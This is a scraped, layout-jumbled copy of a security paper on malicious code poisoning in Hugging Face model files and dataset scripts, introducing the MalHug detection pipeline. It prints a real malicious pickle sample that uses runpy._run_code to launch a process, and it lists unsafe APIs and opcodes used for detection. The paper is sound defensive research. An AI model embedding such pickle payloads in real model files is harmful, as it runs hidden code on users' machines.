0% found this document useful (0 votes)
36 views12 pages

Zhao 等 - 2017 - Models Are Codes Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs

This document presents a systematic study of malicious code poisoning attacks on pre-trained model hubs, particularly focusing on the Hugging Face platform. It introduces MalHug, an end-to-end pipeline designed to detect and classify malicious models and datasets, which has been successfully deployed in a real-world industrial setting. The findings reveal significant security threats and emphasize the need for robust security measures in managing and deploying pre-trained models.

Uploaded by

947721494
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
36 views12 pages

Zhao 等 - 2017 - Models Are Codes Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs

This document presents a systematic study of malicious code poisoning attacks on pre-trained model hubs, particularly focusing on the Hugging Face platform. It introduces MalHug, an end-to-end pipeline designed to detect and classify malicious models and datasets, which has been successfully deployed in a real-world industrial setting. The findings reveal significant security threats and emphasize the need for robust security measures in managing and deploying pre-trained models.

Uploaded by

947721494
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

1

2
Models Are Codes: Towards Measuring Malicious Code Poisoning 59
60
3 Attacks on Pre-trained Model Hubs 61
4 62
5 Jian Zhao1∗ , Shenao Wang1∗ , Yanjie Zhao1† , Xinyi Hou1 , Kailong Wang1 , 63
6
Peiming Gao2 , Yuanchao Zhang2 , Chen Wei2† , Haoyu Wang1 64
7 1 65
Huazhong University of Science and Technology
8 66
9
{jian_zhao_,shenaowang,yanjie_zhao,xinyihou,wangkl,haoyuwang}@hust.edu.cn 67
2 Mybank, Ant Group
10 68
11 {peiming.gpm,yuanchao.zhang,juyi.wc}@mybank.cn 69
12 70
13
ABSTRACT Serving as a centralized repository, Hugging Face currently hosts an 71
14 The proliferation of pre-trained models (PTMs) and datasets has impressive collection of over 761K models and 176K datasets as of 72
15 led to the emergence of centralized model hubs like Hugging Face, July 12, 2024 [27, 32], which provides a collaborative environment 73
16 which facilitate collaborative development and reuse. However, re- for storing and sharing a wide variety of PTMs and datasets. 74
17 cent security reports have uncovered vulnerabilities and instances With the emerging popularity and influence of model hubs, their 75
18 of malicious attacks within these platforms, highlighting growing centralized nature and widespread use also make them high-value 76
19 security concerns. This paper presents the first systematic study targets for malicious actors [31, 60, 82]. Recent security reports have 77
20 of malicious code poisoning attacks on pre-trained model hubs, uncovered vulnerabilities [1, 3, 12, 48] and instances of malicious 78
21 focusing on the Hugging Face platform. We conduct a comprehen- attacks [4, 9, 13, 14, 79, 85] within the Hugging Face platform, high- 79
22 sive threat analysis, develop a taxonomy of model formats, and lighting the growing security concerns in model hubs. One primary 80
23 perform root cause analysis of vulnerable formats. While exist- attack vector involves injecting malicious code into models [9, 79] 81
24 ing tools like Fickling and ModelScan offer some protection, or datasets [1]. This can be achieved through various means, such 82
25 they face limitations in semantic-level analysis and comprehensive as compromising developer accounts [3], exploiting vulnerabilities 83
26 threat detection. To address these challenges, we propose MalHug, in the platform’s upload or verification processes [48], or disguising 84
27 an end-to-end pipeline tailored for Hugging Face that combines malicious code as legitimate model components [5, 9]. Of partic- 85
28 dataset loading script extraction, model deserialization, in-depth ular concern is the exploitation of certain serialization methods, 86
29 taint analysis, and heuristic pattern matching to detect and classify such as Python’s pickle module [66], which have inherent secu- 87
30 malicious code poisoning attacks in datasets and models. In partner- rity implications. This enables malicious actors to inject harmful 88
31 ship with Ant Group, a leading financial technology company, we code during the serialization process, which can then be executed 89
32 have implemented and deployed MalHug in a real-world industrial when the compromised models are loaded for training or infer- 90
33 environment. It has been operational for over three months on a ence [70]. Malicious code poisoning can be used to achieve a range 91
34 mirrored Hugging Face instance within Ant Group’s infrastructure, of nefarious goals, including but not limited to backdoor installa- 92
35 demonstrating its effectiveness and scalability in a large-scale in- tion [9, 11, 38], sensitive information theft [5, 20], and ransomware 93
36 dustrial setting. During this period, MalHug has monitored more deployment [14]. 94
37 than 705K models and 176K datasets, uncovering 264 malicious Security researchers are aware of these attacks and have pro- 95
38 models and 9 malicious dataset loading scripts. These findings re- posed several defensive solutions. Trail of Bits has developed Fick- 96
39 veal a range of security threats, including reverse shell, browser ling [52], a practical decompiler, static analyzer, and bytecode 97
40 credential theft, and system reconnaissance. This work not only rewriter for pickle files. ProtectAI has introduced ModelScan [63], 98
41 bridges a critical gap in understanding the security of the PTM a versatile tool designed to detect security issues across various 99
42 supply chain but also provides a practical, industry-tested solution model formats. Hugging Face has implemented PickleScanning [16], 100
43 for enhancing the security of pre-trained model hubs. which incorporates an anti-virus scan utilizing ClamAV [7] and a 101
44
targeted analysis that extracts and examines the list of imports ref- 102
45 1 INTRODUCTION erenced within pickle files. While these solutions represent signif- 103
icant progress, they face notable limitations. These tools primarily
46 In recent years, Large Language Models (LLMs) such as Chat- 104
rely on detecting specific libraries and function calls, rather than
47 GPT [57] have made significant progress, largely due to advance- 105
analyzing the actual executed code, which makes it challenging to
48 ments in pre-training techniques. These pre-training methods have 106
conduct semantic-level analysis of malicious behaviors, potentially
49 enabled the development of models with massive scale, often reach- 107
leading to both false positives and false negatives, especially when
50 ing billions or even trillions of parameters [2, 18, 40]. The reuse of 108
faced with sophisticated or obfuscated attacks. Moreover, there is
51 these Pre-trained Models (PTMs) has become increasingly impor- 109
a lack of comprehensive understanding of the abuse and attack
52 tant in advancing various AI applications. In this context, model 110
techniques targeting the PTM supply chain. This gap in knowledge
53 hubs (also known as model registries) like Hugging Face [27] play 111
limits our ability to develop advancing defense strategies against
54 a significant role in facilitating the reuse of pre-trained models [30]. 112
55
the full spectrum of threats in PTM ecosystems. 113
∗ Both
56
authors contributed equally to this research. Motivated by the above security concerns, we conduct the first 114
† Yanjie Zhao ([email protected]) and Chen Wei ([email protected]) are the
57
systematic study of malicious code poisoning attacks on pre-trained 115
corresponding authors.
58 1 116
Conference’17, July 2017, Washington, DC, USA Zhao et al.

Table 1: Top 15 popular model hubs: number of models and


117 model hubs, bridging the critical gap in understanding the vulner- 175
datasets, and distribution mechanisms (as of July 6, 2024).
118 abilities and attack vectors within the PTM supply chain. In our 176
Note that “-” indicates no public statistics available or no
119 study, we first undertake a comprehensive pilot study, encompass- 177
dataset hosting service provided.
120 ing threat modeling, systematic model format taxonomy, and root 178
121 cause analysis of vulnerable model formats. Building on these in- Model Hub #Models #Datasets Distribution
179
122 sights, we propose MalHug, an end-to-end pipeline tailored for 180
123 Hugging Face that combines dataset loading scripts extraction, Hugging Face [26] 752,269 174,226 Hub APIs, Git 181
124 model deserialization, in-depth taint analysis, and heuristic pat- Spark NLP [34] 41,346 - Hub APIs, Download 182
125 tern matching, enabling nuanced detection and classification of OpenCSG [58] 26,187 327 Git 183
126 malicious datasets and models. Kaggle [35] 5,932 355,251 Hub APIs, Download 184
127 We have implemented and deployed MalHug in collaboration ModelScope [44] 5,749 2,302 Hub APIs, Git 185
128 with Ant Group, a leading financial technology company, demon- ModelZoo [47] 3,245 - Git 186
129 strating its scalability and effectiveness in a real-world industrial OpenMMLab [59] 2,404 - Git 187
130 setting. MalHug has been operational for over three months on ONNX Model Zoo [55] 1,720 - Git 188
131 a mirrored Hugging Face instance within Ant Group’s infrastruc- NVIDIA NGC [51] 759 - Cli, Download 189
132 ture, continuously monitoring more than 705K models and 176K MindSpore [45] 706 390 Git, Download 190
133 datasets. Through this comprehensive industrial-grade analysis, WiseModel [83] 624 524 Git 191
134 MalHug has successfully identified 264 malicious models and 9 PaddlePaddle [61] 272 10,000 Git 192
135 malicious dataset loading scripts, uncovering a range of security SwanHub [71] 269 - Git 193
136 threats, including sophisticated remote control, browser credential Liandanxia [41] 264 381 Git 194
137 theft, and system reconnaissance. These findings underscore the PyTorch Hub [68] 52 - Hub APIs, Git 195
138 urgent need for robust security measures in industrial AI pipelines 196
139 and provide valuable insights into the specific security challenges 197
140 faced by large-scale financial technology companies in managing 198
141 and deploying pre-trained models. 199
142 To summarize, we make the following contributions: 2.1 Model Hubs and Artifact Reuse 200
143 Model hubs, also known as model registries, have become integral 201
144 to the AI ecosystem, serving as centralized repositories for pre- 202
• Systematic Study. We conduct the first systematic study of
145 trained models, datasets, and associated resources. These platforms 203
malicious code poisoning attacks on PTM hubs, including com-
146 facilitate the distribution, discovery, and deployment of pre-trained 204
prehensive threat modeling, a systematic taxonomy of model
147 models across various domains and applications. Table 1 presents 205
formats, and root cause analysis of vulnerable model formats,
148 an overview of the top 15 popular model hubs, showcasing the 206
which bridges a critical gap in understanding the vulnerabilities
149 scale and diversity of available resources. Among these registries, 207
and attack vectors within the PTM supply chain.
150 Hugging Face [27] stands out as the largest and most comprehensive 208
• Practical Pipeline. We design and implement MalHug, an
151 platform, hosting an impressive 752,269 models and 174,226 datasets 209
end-to-end pipeline tailored for Hugging Face. By integrat-
152 as of July 6, 2024. Its extensive collection spans a wide range of 210
ing dataset loading script extraction, model deserialization,
153 AI tasks and domains, making it a go-to resource for researchers, 211
in-depth taint analysis, and heuristic pattern matching, Mal-
154 developers, and practitioners alike. Given its dominant position in 212
Hug offers a more nuanced and effective approach to detecting
155 the field and its significant impact on the AI community, we have 213
and classifying malicious PTMs and dataset loading scripts.
156 chosen to focus primarily on Hugging Face as the main subject of 214
• Industrial Deployment. We demonstrate the industrial appli-
157 our study in this paper. 215
cability of MalHug through a real-world deployment in col-
158 The proliferation of artifacts (datasets and models) on Hugging 216
laboration with Ant Group. Our system has been operational
159 Face has significantly impacted the landscape of AI research and 217
for over three months on a mirrored Hugging Face instance
160 development, fostering a culture of reuse and collaboration. Re- 218
within Ant Group’s infrastructure, monitoring more than 705K
161 searchers and developers can leverage existing artifacts to train 219
models and 176K datasets. This analysis uncovered 264 mali-
162 new models or fine-tune pre-trained ones for specific tasks, reduc- 220
cious models and 9 malicious dataset loading scripts, revealing
163 ing the time and resources required for data collection, annotation, 221
various security threats and providing valuable insights into
164 and model development. Hugging Face provides convenient tools 222
securing the pipeline for managing and deploying PTMs in
165 for artifact reuse, such as the datasets library for loading and pro- 223
financial technology companies.
166 cessing datasets, and the transformers library for accessing pre- 224
167 trained models. For instance, users can easily load datasets using 225
168 datasets.load_dataset() function, and access pre-trained mod- 226
169 2 BACKGROUND els via AutoModel.from_pretrained() method. This ecosystem 227
170 In this section, we introduce the background about model hubs and of shared resources has led to the emergence of transfer learning as 228
171 artifact (datasets and models) reuse, present the threat model and a dominant paradigm, where models pre-trained on large datasets 229
172 attack surface analysis, and provide a taxonomy of model formats are adapted for various downstream tasks using techniques like 230
173 along with the root cause analysis of their vulnerabilities. fine-tuning or prompt engineering. 231
174 2 232
Models Are Codes: Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs Conference’17, July 2017, Washington, DC, USA

Table 2: Taxonomy of 15 popular model formats and their


233 2.2 Code Poisoning Attacks on Model Hubs 291
234
vulnerability to code injection. Note that indicates that this 292
Attack Vectors. While model hubs like Hugging Face have greatly model format is vulnerable to code injection, G # represents
235 293
benefited the AI community, their centralized nature and wide- partially vulnerable, and # indicates that this model format
236 294
spread use also make them attractive targets for malicious ac- is not vulnerable (as of current knowledge).
237 295
tors [31, 60, 82]. To understand the security implications, we con-
238 Stored Model Format Framework Injection? 296
duct a threat modeling and attack surface analysis of Hugging Face,
239 pickle [66] PyTorch, Scikit-learn 297
focusing primarily on code poisoning attacks, which share simi-
240 marshal [65] / 298
larities with supply chain attacks in open-source software ecosys-
241 joblib [33] PyTorch, Scikit-learn 299
tems [11, 54]. Recently, security researchers [1, 9, 13] have reported
242 dill [42] PyTorch, Scikit-learn 300
two main attack vectors for code poisoning in model hubs:
243 cloudpickle [8] Scikit-learn, MLFlow 301
• Dataset Loading Scripts Exploitation. Dataset loading script
244
Architecture SavedModel [74] Tensorflow G
# 302
is a default feature provided by Hugging Face, typically em-
245
& Weights Checkpoint [72] TensorFlow G
# 303
ployed to load and share datasets composed of data files in
246 TFLite [75] TFLite G
# 304
unsupported formats or requiring more complex data prepa-
247 HDF5 [73] Keras G
# 305
ration. When users invoke the load_dataset function, the
248 GGUF [19] llama # 306
corresponding loading script with the same name will be ex-
249 ONNX [56] ONNX # 307
ecuted by default [15, 24]. While enhancing flexibility, this
250
JSON [64] / # 308
feature creates a significant attack surface, where malicious
251
Weights MsgPack [43] Flax # 309
actors could embed harmful scripts within these datasets [1].
252
Only Safetensors [28] Huggingface # 310
When loaded, these scripts execute automatically, potentially
253
NPY [49] / NPZ [50] Numpy # 311
254
causing severe security breaches. This vulnerability exploits 312
255
users’ trust in reputable data sources and creates a substantial 313
attack surface through automated script execution. 3 TAXONOMY AND ROOT CAUSE ANALYSIS
256 314
257
• Insecure Model Serialization. Many PTMs use insecure seri- Pre-trained models employ a diverse range of serialization formats 315
258
alization formats like pickle [66], which allow arbitrary code for persistent storage and loading [53, 62]. These formats can be 316
259
execution during deserialization. This creates a significant risk categorized based on their serialization mechanisms, security impli- 317
260
of injecting malicious code into model files. When users load cations, and prevalence in the PTM ecosystem. Table 2 presents a 318
261
compromised models, the embedded malicious code executes, comprehensive overview of 16 popular model formats, categorizing 319
262
potentially leading to severe security breaches [9, 13]. This vul- them based on their storage capabilities and vulnerability to code 320
263
nerability is exacerbated by the widespread sharing of PTMs injection attacks. The formats are broadly divided into two cate- 321
264
and users’ implicit trust in models from popular repositories. gories: those that store both architecture and weights, and those 322
265
The complexity and opaqueness of PTMs make detecting such that store weights only. 323
266
embedded malicious code particularly challenging, rendering Formats Storing Both Architecture & Weights. Formats that 324
267
this attack vector difficult to defend against. store both architecture and weights provide a complete representa- 325
tion of the model, including its structure and learned parameters.
268 Threat Model. The attack vectors we have identified exploit the 326
However, this completeness often comes at the cost of increased
269 complex trust relationships within model hubs like Hugging Face. 327
security risks. As shown in Table 2, several widely used formats in
270 Our threat model is based on several key assumptions about the AI 328
this category have varying levels of vulnerability to code injection
271 ecosystem. Firstly, users generally trust content from well-known 329
attacks.
272 model hubs and popular contributors, often prioritizing conve- 330
273 nience and efficiency over rigorous security checks when using • Pickle Variants (Insecure). These Python-specific serializa- 331
274 shared resources. Additionally, security measures on model hubs tion formats, including pickle [66], marshal [65], joblib [33], 332
275 may not always keep pace with rapidly evolving threats. In this dill [42], and cloudpickle [8], are notorious for their susceptibil- 333
276 environment, potential attackers possess a range of capabilities that ity to code injection. They can execute arbitrary Python code 334
277 make them formidable adversaries. They have access to the public- during deserialization, making them highly vulnerable when 335
278 facing interfaces of model hubs and can create and upload datasets handling untrusted data. 336
279 and models to these platforms. More concerning is their array of • TensorFlow and Keras Models (Potential). These formats, 337
280 methods to gain or reinforce this trust within the community. For primarily associated with TensorFlow [72, 74, 75] and Keras [73], 338
281 instance, attackers might exploit leaked authentication tokens [3] have a reduced but still present attack surface. They support 339
282 to gain unauthorized access to reputable accounts, allowing them custom operators (SavedModel, Checkpoint, TFLite) [78] or 340
283 to operate under the guise of trusted entities. They could also em- lambda layers (HDF5) [79] that can potentially execute arbi- 341
284 ploy AI Jacking [48] techniques, registering abandoned models or trary code, though with some additional barriers compared to 342
285 dataset names previously associated with respected organizations, pickle-like formats. 343
286 thereby exploiting residual trust. These sophisticated approaches • GGUF and ONNX (Secure). These more recent formats show 344
287 enable attackers to establish or hijack trusted identities within the promise in terms of security, with no known vulnerabilities to 345
288 model hubs, significantly increasing the potential impact of their code injection as of current knowledge. They strictly limit their 346
289 malicious activities. scope to predefined model computation and transformation 347
290 3 348
Conference’17, July 2017, Washington, DC, USA Zhao et al.

349 407
350 §4.1 Dataset Scripts Extraction §4.3 In-depth Taint Analysis 408
351 409
352 410
353
Datasets File Lists Dataset Unsafe AST CFG/DFG Taint 411
354 Scripts API/Libs Recovery Construction Propagation 412
355 Code 413
Snippets
356 Model Hubs §4.2 Model Deserialization §4.4 Heuristic Pattern Matching Detection 414
357 Results 415
358 416
359 417
Models Vulnerable Binary Unsafe Sensitive Shell Network
360 Format Disassembly Opcodes Information Command Request 418
361 419

Suspicious Code Snipets Extraction Malicious Behavior Identification


362 420
363 421
364 422
365
Figure 1: The workflow of MalHug: extracting suspicious codes from dataset loading scripts (§ 4.1) and deserialized models (§ 4.2), 423
366
then applying taint analysis (§ 4.3) and heuristic pattern matching (§ 4.4) to detect malicious behavior. 424
367 425
operations, avoiding support for arbitrary code execution or don’t directly support code execution during deserialization,
368 426
object instantiation [62]. care must be taken to properly handle the data to avoid potential
369 427
buffer overflow vulnerabilities.
370 Root Cause ▶ The vulnerabilities in these formats stem from a 428
371 fundamental tension between flexibility and security in serializa- 429
Security Features ▶ The security advantages of these formats
372 tion design. Arbitrary object instantiation in pickle variants creates 430
highlight the importance of separating model architecture (which
373 the most severe security risk, effectively blurring the line between 431
may require more complex serialization) from weight storage in
374 data and code. Lambda layers, particularly in HDF5 (Keras), in- 432
machine learning workflows, especially when dealing with poten-
375 troduce an indirect but significant risk through their dependency 433
tially untrusted data sources. ◀
376 on the marshal module for code serialization. Custom operators 434
377 in formats like SavedModel and TFLite present a smaller attack 435
378 surface, as they require explicit loading during inference, but still 4 MALHUG WORKFLOW 436
379 pose potential risks. ◀ In this section, we introduce MalHug, a comprehensive end-to- 437
380 438
end pipeline specifically designed for Hugging Face, focusing on
381 Formats Storing Weights Only. Formats that store only weights 439
detecting code poisoning attacks on dataset loading scripts and
382 provide a more focused representation of the model, containing 440
vulnerable models files (Pickle variants and lambda layers in HDF5).
383 just the learned parameters without the architectural details. This 441
Figure 1 illustrates the workflow of MalHug, which comprises four
384 approach can offer improved security against code injection at- 442
key components: dataset loading scripts extraction, model deseri-
385 tacks, as the architecture is typically defined separately in code. As 443
alization, in-depth taint analysis, and heuristic pattern matching.
386 shown in Table 2, these formats generally have a lower risk of code 444
Notably, MalHug does not aim to invent new program analysis
387 injection vulnerabilities. 445
techniques. Instead, it leverages insights from existing attacks to
388 • JSON (Secure). JavaScript Object Notation (JSON) [64] is a construct an efficient and practical review pipeline for identifying 446
389 lightweight, text-based data interchange format. While not and analyzing potential security threats within Hugging Face. 447
390 specifically designed for ML model storage, it can be used to 448
391 store model weights. JSON is generally safe from code injection 449
392 as it only supports basic data types and structures, without the 4.1 Dataset Loading Scripts Extraction 450
393 ability to represent code or complex objects. The dataset pre-processing stage forms the initial step of our analy- 451
394 • MsgPack (Secure). Used by Flax, MessagePack (MsgPack) [43] sis pipeline, focusing on the extraction and examination of loading 452
395 is a binary serialization format. It’s similar to JSON in terms of scripts associated with datasets from Hugging Face. 453
396 the data it can represent but more compact. MsgPack doesn’t Loading Script Identification. When users employ load_dataset 454
397 support code serialization, making it resilient against direct from Hugging Face’s API, the system executes the namesake load- 455
398 code injection attacks. ing script by default [24]. So, we begin by analyzing the file list 456
399 • Safetensors (Secure). Developed by Hugging Face [28], Safeten- associated with each dataset obtained from Hugging Face. MalHug 457
400 sors could prevent code injection attacks. It uses a simple, searches for Python scripts (.py files) that share the same base 458
401 language-agnostic format that strictly limits deserialization name as the dataset or its components. For instance, if a dataset 459
402 to numerical data, effectively eliminating the risk of arbitrary is named “text_classification_data”, we would extract scripts 460
403 code execution during the loading process. such as “text_classification_data.py”. This method allows us 461
404 • NPY / NPZ (Secure). These NumPy-specific formats [49, 50] to focus on code that is most likely to be executed in conjunction 462
405 are primarily designed for storing numerical arrays. While they with the dataset. 463
406 4 464
Models Are Codes: Towards Measuring Malicious Code Poisoning Attacks on Pre-trained Model Hubs Conference’17, July 2017, Washington, DC, USA

465
Table 3: Unsafe Libraries and APIs. Table 4: Unsafe Pickle opcodes. 523
466 Category Unsafe Libs/APIs Opcode Description 524
467 525
eval, exec, execfile REDUCE Applies callable object to argument tuple
468 526
Builtin Functions __import__, getattr (b‘R’) Pops function and args, pushes return value
469 527
compile, open GLOBAL Imports modules or gets global objects
470 528
471
os.system/popen/spawn* (b‘c’) Pushes retrieved object onto stack 529
Command Execution
472 subprocess.run/call/Popen OBJ Builds class instance (Protocol 1) 530
473 requests.get/post (b‘o’) Uses class object from stack 531
474 urllib.request.urlopen/Request INST Builds class instance (Protocol 0) 532
Network
475 socket.socket/connect (b‘i’) Uses module and class names 533
476 ftplib.FTP, smtplib.SMTP NEWOBJ Builds object instance using __new__ 534
477 535
shutil.rmtree/move (b‘\x81’) Calls cls.__new__(cls, *args)
478 536
pathlib.Path, os.path.join NEWOBJ_EX Extended version of NEWOBJ
479 File System 537
zipfile.ZipFile, tarfile.open (b‘\x92’) Calls cls.__new__(cls, *args, **kwargs)
480 538
glob.glob, fnmatch.filter This higher-level representation exposes the structure of the po-
481 539
482
os.environ/getcwd tentially malicious code. From the AST, we extract suspicious code 540
System Information
483 platform.system/release snippets by analyzing function call arguments. In Figure 2, we iden- 541
484 Crypto.Cipher.AES/DES tify a function call to runpy._run_code with a constant argument 542
485 cryptography.fernet.Fernet that appears to be a Python script (Step#3, line 10-12), which is 543
Cryptography extracted as potentially malicious code.
486 rsa.encrypt/decrypt 544
487 base64.b64encode/b64decode TensorFlow/Keras Model Deserialization. The process of deseri- 545
488 alizing and analyzing TensorFlow and Keras models, as outlined in 546
489 Unsafe Library and API Filtering. Once the relevant scripts are Algorithm 1, focuses on detecting Lambda layers and unsafe opera- 547
490 extracted, we perform an initial analysis to identify unsafe libraries tors within these models. The deserialization process begins with 548
491 and APIs. This process involves scanning the script contents for the ParseModelStructure (line 1), which handles two primary 549
492 import statements and function calls and cross-referencing them formats: SavedModel and HDF5. For SavedModel, we utilize the 550
493 against a curated list of potentially unsafe libraries and APIs. The TensorFlow SavedMetadata.ParseFromString [81] to load the 551
494 risky APIs and Libraries are listed in Table 3, including known dan- model metadata and SavedModel.ParseFromString [69] to load 552
495 gerous functions (e.g., eval, exec), libraries associated with com- the model itself. For HDF5 format, we employ the h5py.File [21, 553
496 mand execution (e.g., os, subprocess), and networking modules 81] to read the model file, extracting the model_config attribute 554
497 that could indicate unauthorized data transmission (e.g., requests, containing a JSON string of the model architecture, and parsing 555
498 urllib). We employ regular expressions and AST (Abstract Syntax this JSON string to obtain layer configurations. Once the model 556
499 Tree) parsing to efficiently identify these elements within the code. structure is parsed, our algorithm iterates through each layer using 557
500 the IterateLayers (line 7-16). This function abstracts the differ- 558
501 4.2 Model Deserialization ences between SavedModel and HDF5 formats, providing a unified 559
502 Model deserialization is a crucial step in our security analysis interface for layer iteration. During iteration, we check for Lambda 560
503 pipeline, designed to uncover potentially malicious code or suspi- layers using the IsLambdaLayer. Simultaneously, we employ the 561
504 cious operations within machine learning model files. Our approach CheckForUnsafeOperators (line 17-23) to identify any usage of 562
505 is tailored to handle various vulnerable model formats used by pop- potentially risky operations. This function searches for specific 563
506 ular frameworks such as PyTorch, Keras, and TensorFlow. TensorFlow operations that could pose security risks, such as file 564
507 PyTorch/Pickle Variants Decompilation. For PyTorch models I/O operations (tf.io.read_file [76], tf.io.write_file [77]). 565
508 saved in .pth, .pt, or .bin formats, which are essentially ZIP Note that we do not conduct in-depth taint analysis on Lambda 566
509 archives typically containing a data.pkl weights file, we employ layers or unsafe operators. This decision is based on several tech- 567
510 a multi-stage decompilation process to analyze potentially mali- nical constraints and considerations. Primarily, the deserialization 568
511 cious code without execution risk. As illustrated in Figure 2, our of marshal-encoded Lambda layers depends on marshal.load [65] 569
512 process begins with extracting the data.pkl file from the model of specific Python versions. Moreover, these layers would require 570
513 archive (Step#1). We then use pickletools[67] to disassemble the dynamic loading in a sandboxed environment. Given these limita- 571
514 pickle bytecode into human-readable opcodes (Step#2). This dis- tions, we have opted to simply flag these instances as potentially 572
515 assembly reveals the underlying structure of the serialized data, unsafe and manually check these models. 573
516 such as the GLOBAL opcode (Step#2, line 2), which imports the 574
517 runpy._run_code function, a potential vector for code execution. 4.3 In-depth Taint Analysis 575
518 We scan these opcodes for unsafe operations that could lead to code After extracting suspicious code snippets from dataset loading 576
519 injection (see Table 4 for a list of potentially unsafe Pickle opcodes). scripts and PyTorch/Pickle Variants models, MalHug implements 577
520 Upon detecting such unsafe opcodes, we employ Fickling[52] to a focused taint analysis, which has been proven to be good at de- 578
521 further decompile the pickle file into an AST, as depicted in Step#3. tecting a wide range of malicious code poisoning attack patterns in 579
522 5 580
Conference’17, July 2017, Washington, DC, USA Zhao et al.

581
Step#1 Original Binary 639
582 640
80 02 63 72 75 6E 70 79 0A 5F 72 75 6E 5F 63 6F 64 65 0A 71 00 58 30 00 00 00 69 6D 70 6F 72 74 20 73 75 62 70 72 6F 63 65 73
583 641
73 0A 0A 73 75 62 70 72 6F 63 65 73 73 2E 72 75 6E 28 5B 27 43 61 6C 63 2E 65 78 65 27 5D 29 0A 71 01 7D 71 02 86 71 03 52 71
584 642
b'\x80\x02crunpy\n_run_code\nq\x00X0\x00\x00\x00import subprocess\n\nsubprocess.run([\'Calc.exe\'])\nq\x01}q\x02\x86q\x03Rq...
585 643
586 644
587 1 Module( 645
588 2 body=[ 646
1 0: \x80PROTO 2 3 ImportFrom(
589 2 2: c GLOBAL 'runpy _run_code' 4 module='runpy’, 647
590 3 19: q BINPUT 0 5 names=[alias(name='_run_code')], 648
4 21: X BINUNICODE "import subprocess\n\n 6 level=0),
591 subprocess.run(['Calc.exe'])\n" 7 Assign( 649
5 74: q BINPUT 1 8 targets=[Name(id='_var0', ctx=Store())],
592 650
6 76: } EMPTY_DICT 9 value=Call(
593 7 77: q BINPUT 2 10 func=Name(id='_run_code', ctx=Load()), 651
8 79: \x86 TUPLE2 11 args=[
594 652
9 80: q BINPUT 3 12 Constant(value="import subprocess
595 10 82: R REDUCE \n\nsubprocess.run(['Calc.exe'])\n"), 653
11 83: q BINPUT 4 13 Dict(keys=[], values=[])],
596 654
... 14 keywords=[])),
597 ... 655
598 Step#2 Disassembled Code Step#3 Decompiled AST 656
599 657
600 Figure 2: The Pickle model decompilation process of MustEr/gpt2-elite. Snippet #1 is the original binary code, snippet #2 658
601 is the disassembled code, and snippet #3 is the decompiled AST. Green highlights suspicious opcodes, while Red indicates 659
602 potentially malicious code. 660
603 661
604 Algorithm 1: Unsafe Keras/TensorFlow Models Detection. to specific source-sink combinations based on different malicious 662
605 Input: Model file 𝑀, a set of 𝑢𝑛𝑠𝑎𝑓 𝑒_𝑜𝑝𝑡 , behavior patterns. Our configuration encompasses a wide range of 663
606 Output: Usage of Lambda layers and unsafe operators potential security threats, including hidden authentication, back- 664
1 𝑚𝑜𝑑𝑒𝑙 ← ParseModelStructure(𝑀 ); doors, cryptojacking, embedded shells, remote control, sensitive
607 665
2 foreach 𝑙𝑎𝑦𝑒𝑟 ∈ IterateLayers(𝑚𝑜𝑑𝑒𝑙 ) do information leakage, and suspicious execution patterns.
608 666
3 if IsLambdaLayer(𝑙𝑎𝑦𝑒𝑟 ) then For each category of threat, we identify specific classes of source
609 4 ℎ𝑎𝑠_𝑙𝑎𝑚𝑏𝑑𝑎_𝑙𝑎𝑦𝑒𝑟 ← True; 667
610 5 break;
and sink APIs that could indicate malicious behavior. For example, 668
in the case of sensitive information leakage attempts, we might con-
611
6 𝑢𝑛𝑠𝑎𝑓 𝑒_𝑜𝑝𝑡 .update(CheckForUnsafeOpt(𝑙𝑎𝑦𝑒𝑟 ) ); 669
612 sider os.envirion or os.getlogin as sources, and requests.get 670
7 Function IterateLayers(𝑚𝑜𝑑𝑒𝑙):
or socket.connect as sinks. This combination could reveal at-
613 8 if 𝑚𝑜𝑑𝑒𝑙 is SavedMetadata then 671
614 9 foreach 𝑛𝑜𝑑𝑒 ∈ 𝑚𝑜𝑑𝑒𝑙 .𝑛𝑜𝑑𝑒𝑠 do tempts to collect sensitive system information and transmit it to an 672
615 10 if 𝑛𝑜𝑑𝑒.𝑖𝑑𝑒𝑛𝑡𝑖 𝑓 𝑖𝑒𝑟 = “_tf_keras_layer” then unauthorized external server. For remote control attempts detec- 673
616
11 𝑙𝑎𝑦𝑒𝑟 ← JSON.parse(𝑛𝑜𝑑𝑒.𝑚𝑒𝑡𝑎𝑑𝑎𝑡𝑎); tion, we might consider the reverse shell commands as sources, and 674
617
12 yield 𝑙𝑎𝑦𝑒𝑟 ; APIs from the command execution as sinks, such as os.system, 675
618 13 else
os.spawn*, and subprocess.run, possibly indicating the injection 676
619 14 𝑐𝑜𝑛𝑓 𝑖𝑔 ← parse(𝑚𝑜𝑑𝑒𝑙 .𝑎𝑡𝑡𝑟𝑠 [“model_config”] ); of unauthorized shell commands. These source-sink pairings allow 677
620 15 foreach 𝑙𝑎𝑦𝑒𝑟 ∈ 𝑐𝑜𝑛𝑓 𝑖𝑔[“config”] [“layers”] do us to track the flow of potentially malicious operations through the 678
621
16 yield 𝑙𝑎𝑦𝑒𝑟 ; code, providing a nuanced understanding of various attack vectors. 679
622 680
17 Function CheckForUnsafeOpt(𝑙𝑎𝑦𝑒𝑟 ): 4.4 Heuristic Pattern Matching
623
18 𝑢𝑛𝑠𝑎𝑓 𝑒_𝑜𝑝𝑠 ← Set( ); 681
624 19 𝑟𝑖𝑠𝑘𝑦_𝑜𝑝𝑠 ← [“tf.io.read_file”, “tf.io.write_file”]; While our taint analysis provides a robust framework for detecting 682
625 20 foreach 𝑜𝑝 ∈ 𝑟𝑖𝑠𝑘𝑦_𝑜𝑝𝑠 do malicious behaviors based on API and library usage, we recog- 683
626 21 if contains(𝑙𝑎𝑦𝑒𝑟 .to_string( ), 𝑜𝑝 ) then nize that not all sources of potential threats can be defined solely 684
627 22 𝑢𝑛𝑠𝑎𝑓 𝑒_𝑜𝑝𝑠.add(𝑜𝑝 ); through Python APIs or libraries. Certain taint sources, such as 685
628 23 return 𝑢𝑛𝑠𝑎𝑓 𝑒_𝑜𝑝𝑠; malicious shell commands or obfuscated malicious code patterns, 686
629
